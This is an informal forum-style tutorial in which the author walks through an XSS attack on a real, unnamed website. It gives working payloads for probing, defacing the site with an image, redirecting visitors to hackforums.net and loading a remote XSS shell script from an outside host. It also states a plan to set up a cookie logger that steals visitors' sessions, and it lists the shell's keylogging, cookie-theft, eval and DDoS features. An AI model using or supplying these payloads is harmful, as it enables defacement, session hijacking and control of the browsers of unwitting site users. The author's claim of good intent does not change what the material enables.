Hacking with XSS .

Demonstration of a real life hack on a vulnerable website through XSS.

Ok so we want to do a bit of xss today, im going to demonstate a hack for you by the means of xss.

First to try and see if a site is vulnerable we use this little script


<script>alert(&quot;something")</script>

Include this script into any search box,guestbook or a feature which allows a user input to be submitted on a site, im going to hide the URL of the site as I am not finished with it and I dont want a skid hacking it and taking credid for it .

So lets try our script and hope its vulnerable




Bingo, Our text script as appeared in a box on your screen suggesting the site is vulnerable to XSS, Now from here on we can do several things firstly, Lets try a deface page...

For this simply add a script directing site to an uploaded daface page, this will embed it on the site suggesting its been hacked, (This is just a demonstration hence why my deface page simply says VipVince)

The script will look like this 

<IMG SRC="http://i205.photobucket.com/albums/bb581/1-youraccount-/12.gif">

And if succesfully executed will cause the website to look like this



Success, as you can see my very simple but still effective deface page has appeared on the site, this is basically what people would call a deface through xss.

I can also redirect it to another site, this is common amongst hackers to redirect a popular site to their site for traffic etc.

For this we add the script

<script>window.open( "http://www.hackforums.net/" )</script>
= will redirect you to another website, in this case "hackforums.net"

I tested this and it did indeed take me to hackforums.net, We could add music or flash videos with these two scripts

Code:
<EMBED SRC="http://mywebsite.com/deface.swf"
= will include a flash video


Code:
<embed src="deface.mid" hidden autostart="true" loop="false" />
= will include a music file in hidden mode

Im not going to deface this site but that does not mean my work is done, What i am going to do is set a cookie logger up on this site which will steal sessions etc, The reason I have blocked this sites URL is cause I know if a skid got access to the site with this info the site would be defaced,the skid would take credid and that would be it. I dont like to destroy however, tomorrow i am going to spend the day configuring a cookie logger and have a link encoded so when users think they are visiting the original site they are actually visiting my cookie logger and giving me their cookie. I am not a blackhat and no website will be harmed, no accounts will be snatched. I do this just for my own knowledge and when my knowledge is satisified through exploration I will leave the site how it first appeared .

I could also run an xss shell on the site, this is done simply by putting uploading my shell to a file hosting site and then adding the script onto the site via the search function, or any feature that allows user input to be processed. the script looks like this:

"><script src="http://free.7host05.com/vip//xssshell.asp"></script>

Running this script will basically execute on the site and give me pretty much complete control, I have taken a description regarding the features these powerful XSS Shells provide from the website I downloaded it off, see below for a detailed explanation...


WHAT IS XSS SHELL ?

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy (http://xss-proxy.sourceforge.net/). Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from slave, you can backdoor the page.

You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.


FEATURES

XSS Shell has several features to gain whole access over slave. Also you can simply add your own commands.

Most of the features can enable or disabled from configuration or can be tweaked from source code.

Features:
Regenerating Pages
Keylogger
Mouse Logger (click points + current DOM)

Built-in Commands: 
Get Keylogger Data
Get Current Page (Current rendered DOM / like screenshot)
Get Cookie
Execute supplied javaScript (eval)
Get Clipboard (IE only)
Get internal IP address (Firefox + JVM only)
Check slave’s visited URL history
DDoS
Force to Crash slave’s browser

This tut I hope gives you an idea, how many different attacks you can carry out via XSS and the high severity of them.